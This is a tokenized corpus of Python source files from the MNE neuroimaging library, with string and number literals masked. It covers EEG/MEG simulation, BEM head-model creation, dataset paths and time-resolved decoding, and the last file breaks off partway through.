<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> import mne <EOL> from mne . datasets import sample <EOL> from mne . time_frequency import fit_iir_model_raw <EOL> from mne . viz import plot_sparse_source_estimates <EOL> from mne . simulation import simulate_sparse_stc , simulate_evoked <EOL> print ( __doc__ ) <EOL> data_path = sample . data_path ( ) <EOL> raw = mne . io . read_raw_fif ( data_path + '<STR_LIT>' ) <EOL> proj = mne . read_proj ( data_path + '<STR_LIT>' ) <EOL> raw . info [ '<STR_LIT>' ] += proj <EOL> raw . info [ '<STR_LIT>' ] = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> fwd_fname = data_path + '<STR_LIT>' <EOL> ave_fname = data_path + '<STR_LIT>' <EOL> cov_fname = data_path + '<STR_LIT>' <EOL> fwd = mne . read_forward_solution ( fwd_fname , force_fixed = True , surf_ori = True ) <EOL> fwd = mne . pick_types_forward ( fwd , meg = True , eeg = True , exclude = raw . info [ '<STR_LIT>' ] ) <EOL> cov = mne . read_cov ( cov_fname ) <EOL> info = mne . io . read_info ( ave_fname ) <EOL> label_names = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> labels = [ mne . read_label ( data_path + '<STR_LIT>' % ln ) <EOL> for ln in label_names ] <EOL> times = np . arange ( <NUM_LIT> , dtype = np . float ) / raw . info [ '<STR_LIT>' ] - <NUM_LIT:0.1> <EOL> rng = np . random . RandomState ( <NUM_LIT> ) <EOL> def data_fun ( times ) : <EOL> """<STR_LIT>""" <EOL> return ( <NUM_LIT> * np . sin ( <NUM_LIT> * times ) * <EOL> np . exp ( - ( times - <NUM_LIT> + <NUM_LIT> * rng . randn ( <NUM_LIT:1> ) ) ** <NUM_LIT:2> / <NUM_LIT> ) ) <EOL> stc = simulate_sparse_stc ( fwd [ '<STR_LIT:src>' ] , n_dipoles = <NUM_LIT:2> , times = times , <EOL> random_state = <NUM_LIT> , labels = labels , data_fun = data_fun ) <EOL> picks = mne . pick_types ( raw . info , meg = True , exclude = '<STR_LIT>' ) <EOL> iir_filter = fit_iir_model_raw ( raw , order = <NUM_LIT:5> , picks = picks , tmin = <NUM_LIT> , tmax = <NUM_LIT> ) [ <NUM_LIT:1> ] <EOL> snr = <NUM_LIT> <EOL> evoked = simulate_evoked ( fwd , stc , info , cov , snr , iir_filter = iir_filter ) <EOL> plot_sparse_source_estimates ( fwd [ '<STR_LIT:src>' ] , stc , bgcolor = ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> opacity = <NUM_LIT:0.5> , high_resolution = True ) <EOL> plt . figure ( ) <EOL> plt . psd ( evoked . data [ <NUM_LIT:0> ] ) <EOL> evoked . plot ( ) </s>
<s> """<STR_LIT>""" <EOL> from . _lcmv import lcmv , lcmv_epochs , lcmv_raw , tf_lcmv <EOL> from . _dics import dics , dics_epochs , dics_source_power , tf_dics <EOL> from . _rap_music import rap_music </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from mne . bem import convert_flash_mris , make_flash_bem <EOL> def run ( ) : <EOL> from mne . commands . utils import get_optparser <EOL> parser = get_optparser ( __file__ ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , default = None ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , default = None ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , default = False , <EOL> help = ( "<STR_LIT>" ) , ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , default = False , <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , default = False , <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , default = False , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" , <EOL> default = False ) <EOL> options , args = parser . parse_args ( ) <EOL> subject = options . subject <EOL> subjects_dir = options . subjects_dir <EOL> flash30 = not options . noflash30 <EOL> convert = not options . noconvert <EOL> unwarp = options . unwarp <EOL> overwrite = options . overwrite <EOL> show = options . show <EOL> if options . subject is None : <EOL> parser . print_help ( ) <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> convert_flash_mris ( subject = subject , subjects_dir = subjects_dir , <EOL> flash30 = flash30 , convert = convert , unwarp = unwarp ) <EOL> make_flash_bem ( subject = subject , subjects_dir = subjects_dir , <EOL> overwrite = overwrite , show = show ) <EOL> is_main = ( __name__ == '<STR_LIT:__main__>' ) <EOL> if is_main : <EOL> run ( ) </s>
<s> import os . path as op <EOL> from ... utils import verbose <EOL> from ... fixes import partial <EOL> from . . utils import ( has_dataset , _data_path , _get_version , _version_doc , <EOL> _data_path_doc ) <EOL> has_brainstorm_data = partial ( has_dataset , name = '<STR_LIT>' ) <EOL> _description = u"""<STR_LIT>""" <EOL> @ verbose <EOL> def data_path ( path = None , force_update = False , update_path = True , download = True , <EOL> verbose = None ) : <EOL> archive_name = dict ( brainstorm = '<STR_LIT>' ) <EOL> data_path = _data_path ( path = path , force_update = force_update , <EOL> update_path = update_path , name = '<STR_LIT>' , <EOL> download = download , archive_name = archive_name ) <EOL> if data_path != '<STR_LIT>' : <EOL> return op . join ( data_path , '<STR_LIT>' ) <EOL> else : <EOL> return data_path <EOL> _data_path_doc = _data_path_doc . format ( name = '<STR_LIT>' , <EOL> conf = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _data_path_doc = _data_path_doc . replace ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> data_path . __doc__ = _data_path_doc <EOL> def get_version ( ) : <EOL> return _get_version ( '<STR_LIT>' ) <EOL> get_version . __doc__ = _version_doc . format ( name = '<STR_LIT>' ) <EOL> def description ( ) : <EOL> """<STR_LIT>""" <EOL> for desc in _description . splitlines ( ) : <EOL> print ( desc ) </s>
<s> import numpy as np <EOL> import copy <EOL> from . . io . pick import _pick_data_channels <EOL> from . . viz . decoding import plot_gat_matrix , plot_gat_times <EOL> from . . parallel import parallel_func , check_n_jobs <EOL> from . . utils import warn , check_version <EOL> class _DecodingTime ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> s = "<STR_LIT>" <EOL> if "<STR_LIT:start>" in self : <EOL> s += "<STR_LIT>" % ( self [ "<STR_LIT:start>" ] ) <EOL> if "<STR_LIT>" in self : <EOL> s += "<STR_LIT>" % ( self [ "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in self : <EOL> s += "<STR_LIT>" % ( self [ "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in self : <EOL> s += "<STR_LIT>" % ( self [ "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in self : <EOL> depth = [ len ( ii ) for ii in self [ "<STR_LIT>" ] ] <EOL> if len ( np . unique ( depth ) ) == <NUM_LIT:1> : <EOL> if depth [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> s += "<STR_LIT>" % ( len ( depth ) ) <EOL> else : <EOL> s += "<STR_LIT>" % ( len ( depth ) , depth [ <NUM_LIT:0> ] ) <EOL> else : <EOL> s += ( "<STR_LIT>" % <EOL> ( len ( depth ) , <EOL> min ( [ len ( ii ) for ii in depth ] ) , <EOL> max ( ( [ len ( ii ) for ii in depth ] ) ) ) ) <EOL> return "<STR_LIT>" % s <EOL> class _GeneralizationAcrossTime ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , picks = None , cv = <NUM_LIT:5> , clf = None , train_times = None , <EOL> test_times = None , predict_method = '<STR_LIT>' , <EOL> predict_mode = '<STR_LIT>' , scorer = None , n_jobs = <NUM_LIT:1> ) : <EOL> from sklearn . preprocessing import StandardScaler <EOL> from sklearn . linear_model import LogisticRegression <EOL> from sklearn . pipeline import Pipeline <EOL> self . cv = cv <EOL> self . train_times = ( _DecodingTime ( ) if train_times is None <EOL> else _DecodingTime ( train_times ) ) <EOL> if test_times is None : <EOL> self . test_times = _DecodingTime ( ) <EOL> elif test_times == '<STR_LIT>' : <EOL> self . test_times = '<STR_LIT>' <EOL> else : <EOL> self . test_times = _DecodingTime ( test_times ) <EOL> if clf is None : <EOL> scaler = StandardScaler ( ) <EOL> estimator = LogisticRegression ( ) <EOL> clf = Pipeline ( [ ( '<STR_LIT>' , scaler ) , ( '<STR_LIT>' , estimator ) ] ) <EOL> self . clf = clf <EOL> self . predict_mode = predict_mode <EOL> self . scorer = scorer <EOL> self . picks = picks <EOL> self . predict_method = predict_method <EOL> self . n_jobs = n_jobs <EOL> def fit ( self , epochs , y = None ) : <EOL> """<STR_LIT>""" <EOL> from sklearn . base import clone <EOL> for att in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if hasattr ( self , att ) : <EOL> delattr ( self , att ) <EOL> n_jobs = self . n_jobs <EOL> X , y , self . picks_ = _check_epochs_input ( epochs , y , self . picks ) <EOL> self . ch_names = [ epochs . ch_names [ p ] for p in self . picks_ ] <EOL> self . cv_ , self . _cv_splits = _set_cv ( self . cv , clf = self . clf , X = X , y = y ) <EOL> self . y_train_ = y <EOL> self . train_times_ = _sliding_window ( epochs . times , self . train_times , <EOL> epochs . info [ '<STR_LIT>' ] ) <EOL> parallel , p_func , n_jobs = parallel_func ( _fit_slices , n_jobs ) <EOL> n_chunks = min ( len ( self . train_times_ [ '<STR_LIT>' ] ) , n_jobs ) <EOL> time_chunks = np . array_split ( self . train_times_ [ '<STR_LIT>' ] , n_chunks ) <EOL> out = parallel ( p_func ( clone ( self . clf ) , <EOL> X [ ... , np . unique ( np . concatenate ( time_chunk ) ) ] , <EOL> y , time_chunk , self . _cv_splits ) <EOL> for time_chunk in time_chunks ) <EOL> self . estimators_ = sum ( out , list ( ) ) <EOL> return self <EOL> def predict ( self , epochs ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self . clf , self . predict_method ) : <EOL> raise NotImplementedError ( '<STR_LIT>' % ( <EOL> self . clf , self . predict_method ) ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if self . predict_mode not in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if self . predict_mode == '<STR_LIT>' : <EOL> n_est_cv = [ len ( estimator ) for estimator in self . estimators_ ] <EOL> heterogeneous_cv = len ( set ( n_est_cv ) ) != <NUM_LIT:1> <EOL> mismatch_cv = n_est_cv [ <NUM_LIT:0> ] != len ( self . _cv_splits ) <EOL> mismatch_y = len ( self . y_train_ ) != len ( epochs ) <EOL> if heterogeneous_cv or mismatch_cv or mismatch_y : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for att in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if hasattr ( self , att ) : <EOL> delattr ( self , att ) <EOL> _warn_once . clear ( ) <EOL> X , y , _ = _check_epochs_input ( epochs , None , self . picks_ ) <EOL> if not np . all ( [ len ( test ) for train , test in self . _cv_splits ] ) : <EOL> warn ( '<STR_LIT>' ) <EOL> if self . test_times == '<STR_LIT>' : <EOL> test_times = _DecodingTime ( ) <EOL> test_times [ '<STR_LIT>' ] = [ [ s ] for s in self . train_times_ [ '<STR_LIT>' ] ] <EOL> test_times [ '<STR_LIT>' ] = [ [ s ] for s in self . train_times_ [ '<STR_LIT>' ] ] <EOL> elif isinstance ( self . test_times , dict ) : <EOL> test_times = copy . deepcopy ( self . test_times ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in test_times : <EOL> if '<STR_LIT>' not in self . train_times_ . keys ( ) : <EOL> ValueError ( '<STR_LIT>' ) <EOL> test_times [ '<STR_LIT>' ] = test_times . get ( '<STR_LIT>' , <EOL> self . train_times_ [ '<STR_LIT>' ] ) <EOL> slices_list = list ( ) <EOL> for _ in range ( len ( self . train_times_ [ '<STR_LIT>' ] ) ) : <EOL> test_times_ = _sliding_window ( epochs . times , test_times , <EOL> epochs . info [ '<STR_LIT>' ] ) <EOL> slices_list += [ test_times_ [ '<STR_LIT>' ] ] <EOL> test_times = test_times_ <EOL> test_times [ '<STR_LIT>' ] = slices_list <EOL> test_times [ '<STR_LIT>' ] = [ _set_window_time ( test , epochs . times ) <EOL> for test in test_times [ '<STR_LIT>' ] ] <EOL> for train , tests in zip ( self . train_times_ [ '<STR_LIT>' ] , <EOL> test_times [ '<STR_LIT>' ] ) : <EOL> if not np . all ( [ len ( test ) == len ( train ) for test in tests ] ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . test_times_ = test_times <EOL> n_orig_epochs , _ , n_times = X . shape <EOL> test_epochs = [ ] <EOL> if self . predict_mode == '<STR_LIT>' : <EOL> test_idxs = [ ii for train , test in self . _cv_splits for ii in test ] <EOL> start = <NUM_LIT:0> <EOL> for _ , test in self . _cv_splits : <EOL> n_test_epochs = len ( test ) <EOL> stop = start + n_test_epochs <EOL> test_epochs . append ( slice ( start , stop , <NUM_LIT:1> ) ) <EOL> start += n_test_epochs <EOL> X = X [ test_idxs ] <EOL> parallel , p_func , n_jobs = parallel_func ( _predict_slices , self . n_jobs ) <EOL> n_test_slice = max ( len ( sl ) for sl in self . test_times_ [ '<STR_LIT>' ] ) <EOL> n_chunks = min ( n_test_slice , n_jobs ) <EOL> chunks = [ np . array_split ( slices , n_chunks ) <EOL> for slices in self . test_times_ [ '<STR_LIT>' ] ] <EOL> chunks = map ( list , zip ( * chunks ) ) <EOL> y_pred = parallel ( p_func ( <EOL> estimators = self . estimators_ , cv_splits = self . _cv_splits , <EOL> predict_mode = self . predict_mode , predict_method = self . predict_method , <EOL> n_orig_epochs = n_orig_epochs , test_epochs = test_epochs , <EOL> ** dict ( zip ( [ '<STR_LIT:X>' , '<STR_LIT>' ] , _chunk_data ( X , chunk ) ) ) ) <EOL> for chunk in chunks ) <EOL> n_tests = [ len ( sl ) for sl in self . test_times_ [ '<STR_LIT>' ] ] <EOL> if len ( set ( n_tests ) ) == <NUM_LIT:1> : <EOL> self . y_pred_ = np . concatenate ( y_pred , axis = <NUM_LIT:1> ) <EOL> else : <EOL> self . y_pred_ = [ [ test for chunk in train for test in chunk ] <EOL> for train in map ( list , zip ( * y_pred ) ) ] <EOL> return self . y_pred_ <EOL> def score ( self , epochs = None , y = None ) : <EOL> """<STR_LIT>""" <EOL> import sklearn . metrics <EOL> from sklearn . base import is_classifier <EOL> from sklearn . metrics import accuracy_score , mean_squared_error <EOL> if check_version ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> from sklearn . base import is_regressor <EOL> else : <EOL> def is_regressor ( clf ) : <EOL> return False <EOL> if epochs is not None : <EOL> self . predict ( epochs ) <EOL> else : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . scorer_ = self . scorer <EOL> if self . scorer_ is None : <EOL> if self . predict_method == "<STR_LIT>" : <EOL> if is_classifier ( self . clf ) : <EOL> self . scorer_ = accuracy_score <EOL> elif is_regressor ( self . clf ) : <EOL> self . scorer_ = mean_squared_error <EOL> elif isinstance ( self . scorer_ , str ) : <EOL> if hasattr ( sklearn . metrics , '<STR_LIT>' % self . scorer_ ) : <EOL> self . scorer_ = getattr ( sklearn . metrics , '<STR_LIT>' % <EOL> self . scorer_ ) <EOL> else : <EOL> raise KeyError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( self . scorer_ ) ) <EOL> if not self . scorer_ : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:.>' % ( self . clf , self . predict_method ) ) <EOL> if y is None : <EOL> if self . predict_mode == '<STR_LIT>' : <EOL> y = self . y_train_ <EOL> else : <EOL> if epochs is not None : <EOL> y = epochs . events [ : , <NUM_LIT:2> ] <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not np . all ( np . unique ( y ) == np . unique ( self . y_train_ ) ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> elif isinstance ( y , list ) : <EOL> y = np . array ( y ) <EOL> for att in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if hasattr ( self , att ) : <EOL> delattr ( self , att ) <EOL> self . y_true_ = y <EOL> n_jobs = min ( len ( self . y_pred_ [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) , check_n_jobs ( self . n_jobs ) ) <EOL> parallel , p_func , n_jobs = parallel_func ( _score_slices , n_jobs ) <EOL> n_estimators = len ( self . train_times_ [ '<STR_LIT>' ] ) <EOL> n_chunks = min ( n_estimators , n_jobs ) <EOL> chunks = np . array_split ( range ( len ( self . train_times_ [ '<STR_LIT>' ] ) ) , <EOL> n_chunks ) <EOL> scores = parallel ( p_func ( <EOL> self . y_true_ , [ self . y_pred_ [ train ] for train in chunk ] , <EOL> self . scorer_ ) for chunk in chunks ) <EOL> self . scores_ = np . array ( [ score for chunk in scores for score in chunk ] ) <EOL> return self . scores_ <EOL> _warn_once = dict ( ) <EOL> def _predict_slices ( X , train_times , estimators , cv_splits , predict_mode , <EOL> predict_method , n_orig_epochs , test_epochs ) : <EOL> """<STR_LIT>""" <EOL> n_epochs , _ , n_times = X . shape <EOL> n_train = len ( estimators ) <EOL> n_test = [ len ( test_t_idxs ) for test_t_idxs in train_times ] <EOL> y_pred = None <EOL> for train_t_idx , ( estimator_cv , test_t_idxs ) in enumerate ( <EOL> zip ( estimators , train_times ) ) : <EOL> start = np . arange ( n_times ) <EOL> contiguous_start = np . array_equal ( [ sl [ <NUM_LIT:0> ] for sl in test_t_idxs ] , start ) <EOL> window_lengths = np . unique ( [ len ( sl ) for sl in test_t_idxs ] ) <EOL> vectorize_times = ( window_lengths == <NUM_LIT:1> ) and contiguous_start <EOL> if vectorize_times : <EOL> test_t_idxs = [ slice ( start [ <NUM_LIT:0> ] , start [ - <NUM_LIT:1> ] + <NUM_LIT:1> , <NUM_LIT:1> ) ] <EOL> elif _warn_once . get ( '<STR_LIT>' , True ) : <EOL> if len ( test_t_idxs ) > <NUM_LIT:1> : <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _warn_once [ '<STR_LIT>' ] = False <EOL> for ii , test_t_idx in enumerate ( test_t_idxs ) : <EOL> X_pred = X <EOL> if not vectorize_times : <EOL> X_pred = X [ : , : , test_t_idx ] . reshape ( n_epochs , - <NUM_LIT:1> ) <EOL> if predict_mode == '<STR_LIT>' : <EOL> y_pred_ = _predict ( X_pred , estimator_cv , <EOL> vectorize_times = vectorize_times , <EOL> predict_method = predict_method ) <EOL> if y_pred is None : <EOL> n_dim = y_pred_ . shape [ - <NUM_LIT:1> ] <EOL> y_pred = _init_ypred ( n_train , n_test , n_orig_epochs , n_dim ) <EOL> if vectorize_times : <EOL> y_pred [ train_t_idx ] [ test_t_idx ] = y_pred_ <EOL> else : <EOL> y_pred [ train_t_idx ] [ ii ] = y_pred_ <EOL> elif predict_mode == '<STR_LIT>' : <EOL> for ( _ , test ) , test_epoch , estimator in zip ( <EOL> cv_splits , test_epochs , estimator_cv ) : <EOL> if test . size == <NUM_LIT:0> : <EOL> continue <EOL> y_pred_ = _predict ( X_pred [ test_epoch ] , [ estimator ] , <EOL> vectorize_times = vectorize_times , <EOL> predict_method = predict_method ) <EOL> if y_pred is None : <EOL> n_dim = y_pred_ . shape [ - <NUM_LIT:1> ] <EOL> y_pred = _init_ypred ( n_train , n_test , n_orig_epochs , <EOL> n_dim ) <EOL> if vectorize_times : <EOL> y_pred [ train_t_idx ] [ test_t_idx , test , ... ] = y_pred_ <EOL> else : <EOL> y_pred [ train_t_idx ] [ ii , test , ... ] = y_pred_ <EOL> return y_pred <EOL> def _init_ypred ( n_train , n_test , n_orig_epochs , n_dim ) : <EOL> """<STR_LIT>""" <EOL> if len ( set ( n_test ) ) == <NUM_LIT:1> : <EOL> y_pred = np . empty ( ( n_train , n_test [ <NUM_LIT:0> ] , n_orig_epochs , n_dim ) ) <EOL> else : <EOL> y_pred = np . array ( [ np . empty ( ( this_n , n_orig_epochs , n_dim ) ) <EOL> for this_n in n_test ] ) <EOL> return y_pred <EOL> def _score_slices ( y_true , list_y_pred , scorer ) : <EOL> """<STR_LIT>""" <EOL> scores_list = list ( ) <EOL> for y_pred in list_y_pred : <EOL> scores = list ( ) <EOL> for t , this_y_pred in enumerate ( y_pred ) : <EOL> scores . append ( scorer ( y_true , np . array ( this_y_pred ) ) ) <EOL> scores_list . append ( scores ) <EOL> return scores_list <EOL> def _check_epochs_input ( epochs , y , picks = None ) : <EOL> """<STR_LIT>""" <EOL> if y is None : <EOL> y = epochs . events [ : , <NUM_LIT:2> ] <EOL> elif isinstance ( y , list ) : <EOL> y = np . array ( y ) <EOL> X = epochs . get_data ( ) <EOL> if picks is None : <EOL> picks = _pick_data_channels ( epochs . info , with_ref_meg = False ) <EOL> if isinstance ( picks , ( list , np . ndarray ) ) : <EOL> picks = np . array ( picks , dtype = np . int ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> X = X [ : , picks , : ] <EOL> assert X . shape [ <NUM_LIT:0> ] == y . shape [ <NUM_LIT:0> ] <EOL> return X , y , picks <EOL> def _fit_slices ( clf , x_chunk , y , slices , cv_splits ) : <EOL> """<STR_LIT>""" <EOL> from sklearn . base import clone <EOL> n_epochs = len ( x_chunk ) <EOL> estimators = list ( ) <EOL> values = np . unique ( [ val for sl in slices for val in sl ] ) <EOL> for t_slice in slices : <EOL> t_slice = np . array ( [ np . where ( ii == values ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] for ii in t_slice ] ) <EOL> X = x_chunk [ ... , t_slice ] <EOL> X = X . reshape ( n_epochs , np . prod ( X . shape [ <NUM_LIT:1> : ] ) ) <EOL> estimators_ = list ( ) <EOL> for fold , ( train , test ) in enumerate ( cv_splits ) : <EOL> clf_ = clone ( clf ) <EOL> clf_ . fit ( X [ train , : ] , y [ train ] ) <EOL> estimators_ . append ( clf_ ) <EOL> estimators . append ( estimators_ ) <EOL> return estimators <EOL> def _sliding_window ( times , window , sfreq ) : <EOL> """<STR_LIT>""" <EOL> import copy <EOL> window = _DecodingTime ( copy . deepcopy ( window ) ) <EOL> time_slices = window . get ( '<STR_LIT>' , None ) <EOL> if time_slices is None : <EOL> window [ '<STR_LIT:start>' ] = window . get ( '<STR_LIT:start>' , times [ <NUM_LIT:0> ] ) <EOL> window [ '<STR_LIT>' ] = window . get ( '<STR_LIT>' , times [ - <NUM_LIT:1> ] ) <EOL> window [ '<STR_LIT>' ] = window . get ( '<STR_LIT>' , <NUM_LIT:1.> / sfreq ) <EOL> window [ '<STR_LIT>' ] = window . get ( '<STR_LIT>' , <NUM_LIT:1.> / sfreq ) <EOL> if not ( times [ <NUM_LIT:0> ] <= window [ '<STR_LIT:start>' ] <= times [ - <NUM_LIT:1> ] ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % ( <EOL> window [ '<STR_LIT:start>' ] , times [ <NUM_LIT:0> ] , times [ - <NUM_LIT:1> ] ) ) <EOL> if not ( times [ <NUM_LIT:0> ] <= window [ '<STR_LIT>' ] <= times [ - <NUM_LIT:1> ] ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % ( <EOL> window [ '<STR_LIT>' ] , times [ <NUM_LIT:0> ] , times [ - <NUM_LIT:1> ] ) ) <EOL> if window [ '<STR_LIT>' ] < <NUM_LIT:1.> / sfreq : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if window [ '<STR_LIT>' ] < <NUM_LIT:1.> / sfreq : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if window [ '<STR_LIT>' ] > np . ptp ( times ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def find_t_idx ( t ) : <EOL> return np . argmin ( np . abs ( np . asarray ( times ) - t ) ) <EOL> start = find_t_idx ( window [ '<STR_LIT:start>' ] ) <EOL> stop = find_t_idx ( window [ '<STR_LIT>' ] ) <EOL> step = int ( round ( window [ '<STR_LIT>' ] * sfreq ) ) <EOL> length = int ( round ( window [ '<STR_LIT>' ] * sfreq ) ) <EOL> time_slices = [ range ( start , start + length ) ] <EOL> while ( time_slices [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] + step ) <= ( stop - length + <NUM_LIT:1> ) : <EOL> start = time_slices [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] + step <EOL> time_slices . append ( range ( start , start + length ) ) <EOL> window [ '<STR_LIT>' ] = time_slices <EOL> window [ '<STR_LIT>' ] = _set_window_time ( window [ '<STR_LIT>' ] , times ) <EOL> return window <EOL> def _set_window_time ( slices , times ) : <EOL> """<STR_LIT>""" <EOL> t_idx_ = [ t [ - <NUM_LIT:1> ] for t in slices ] <EOL> return times [ t_idx_ ] <EOL> def _predict ( X , estimators , vectorize_times , predict_method ) : <EOL> """<STR_LIT>""" <EOL> from scipy import stats <EOL> from sklearn . base import is_classifier <EOL> orig_shape = X . shape <EOL> n_epochs = orig_shape [ <NUM_LIT:0> ] <EOL> n_times = orig_shape [ - <NUM_LIT:1> ] <EOL> n_clf = len ( estimators ) <EOL> if vectorize_times : <EOL> X = np . hstack ( X ) . T <EOL> n_epochs_tmp = len ( X ) <EOL> for fold , clf in enumerate ( estimators ) : <EOL> _y_pred = getattr ( clf , predict_method ) ( X ) <EOL> if _y_pred . ndim == <NUM_LIT:1> : <EOL> _y_pred = _y_pred [ : , None ] <EOL> if fold == <NUM_LIT:0> : <EOL> predict_size = _y_pred . shape [ <NUM_LIT:1> ] <EOL> y_pred = np . ones ( ( n_epochs_tmp , predict_size , n_clf ) ) <EOL> y_pred [ : , : , fold ] = _y_pred <EOL> if fold > <NUM_LIT:0> : <EOL> if is_classifier ( clf ) and ( predict_method == '<STR_LIT>' ) : <EOL> y_pred , _ = stats . mode ( y_pred , axis = <NUM_LIT:2> ) <EOL> else : <EOL> y_pred = np . mean ( y_pred , axis = <NUM_LIT:2> , keepdims = True ) <EOL> y_pred = y_pred [ : , : , <NUM_LIT:0> ] <EOL> if vectorize_times : <EOL> shape = [ n_epochs , n_times , y_pred . shape [ - <NUM_LIT:1> ] ] <EOL> y_pred = y_pred . reshape ( shape ) . transpose ( [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> ] ) <EOL> return y_pred <EOL> class GeneralizationAcrossTime ( _GeneralizationAcrossTime ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , picks = None , cv = <NUM_LIT:5> , clf = None , train_times = None , <EOL> test_times = None , predict_method = '<STR_LIT>' , <EOL> predict_mode = '<STR_LIT>' , scorer = None , n_jobs = <NUM_LIT:1> ) : <EOL> super ( GeneralizationAcrossTime , self ) . __init__ ( <EOL> picks = picks , cv = cv , clf = clf , train_times = train_times , <EOL> test_times = test_times , predict_method = predict_method , <EOL> predict_mode = predict_mode , scorer = scorer , n_jobs = n_jobs ) <EOL> def __repr__ ( self ) : <EOL> s = '<STR_LIT>' <EOL> if hasattr ( self , "<STR_LIT>" ) : <EOL> s += "<STR_LIT>" % ( <EOL> self . train_times_ . get ( '<STR_LIT:start>' , np . nan ) , <EOL> self . train_times_ . get ( '<STR_LIT>' , np . nan ) ) <EOL> else : <EOL> s += '<STR_LIT>' <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> s += ( "<STR_LIT>" % len ( self . y_pred_ [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> s += "<STR_LIT>" <EOL> if hasattr ( self , "<STR_LIT>" ) and hasattr ( self , '<STR_LIT>' ) : <EOL> s += '<STR_LIT>' <EOL> else : <EOL> s += '<STR_LIT:U+002CU+0020>' <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> s += "<STR_LIT>" <EOL> if callable ( self . scorer_ ) : <EOL> s += "<STR_LIT>" % ( self . scorer_ . __name__ ) <EOL> else : <EOL> s += "<STR_LIT>" <EOL> return "<STR_LIT>" % s <EOL> def plot ( self , title = None , vmin = None , vmax = None , tlim = None , ax = None , <EOL> cmap = '<STR_LIT>' , show = True , colorbar = True , <EOL> xlabel = True , ylabel = True ) : <EOL> """<STR_LIT>""" <EOL> return plot_gat_matrix ( self , title = title , vmin = vmin , vmax = vmax , <EOL> tlim = tlim , ax = ax , cmap = cmap , show = show , <EOL> colorbar = colorbar , xlabel = xlabel , ylabel = ylabel ) <EOL> def plot_diagonal ( self , title = None , xmin = None , xmax = None , ymin = None , <EOL> ymax = None , ax = None , show = True , color = None , <EOL> xlabel = True , ylabel = True , legend = True , chance = True , <EOL> 